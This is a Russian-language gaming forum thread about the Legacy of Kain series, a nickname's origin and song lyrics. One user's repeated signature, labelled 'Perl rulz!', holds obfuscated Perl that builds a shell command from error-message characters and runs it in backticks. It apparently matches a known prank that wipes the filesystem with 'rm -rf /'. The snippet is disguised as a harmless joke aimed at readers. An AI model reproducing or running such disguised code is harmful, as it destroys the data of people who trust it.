WodkaGT
ты кстати в первого БО поиграл которого я заливал?) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
WodkaGT
а я вот хотел поинтересоваться ,откуда взял название ника т.е. история твоего ника!
Водка это меня так называли патамучта русскей А ГТ эта Додж Чаржер ГТ Вот так вот. _________________ And if I die before i wake... LET THE MOTHERSHIP LAND MY SOUL TO TAKE!
WodkaGT
ты кстати в первого БО поиграл которого я заливал?)
Неа...он не запустился сволочь.......я об него башкой постучался побился да забил. Со злости еще раз прошел Defiance. Нашел три новых интересных момента. _________________ And if I die before i wake... LET THE MOTHERSHIP LAND MY SOUL TO TAKE!
Ну до меня допёрло про что Разиель с Ариель калякает возле столбов, и почему он так резко меняет своё мнение о каине. И почему всётаки Каин сбросил Разиеля со скалы еще в первой части Соул Ривера. _________________ And if I die before i wake... LET THE MOTHERSHIP LAND MY SOUL TO TAKE!
хех (=
а ведь действительно, сколько раз ни проходишь, всегда что-то новое да найдешь _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
СЕРЖ ТАНКЯЙН, СРЕЛЯТЬ-КОЛОТИТЬ, ЭТО Ж СЕРЖ ТАНКЯЙН!!! ФАК МОЙ МОЗГ!!!111 _________________ Скажи, что я ее люблю... Без нее вся жизнь равна нулю, из-за нее вся жизнь равна нулю... (с) А.Васильев
У тоб? так багато стор?н, я просто не розум?ю... Я просто хочу спитати тебе, чому ти наст?льки красива!?... (с) Олег Собчук
Цитаты дня:
xxx
Я много зарабатываю
xxx
Я работаю ртом
xxx
Я певица
yyy
а с личной жизнью все в порядке?
zzz
угу, еще как! Полный порядок. Мы никогда не ссоримся, не надоедаем друг другу и вообще во всем абсолютное согласие и единение
скай из овер в конце классно затянул _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!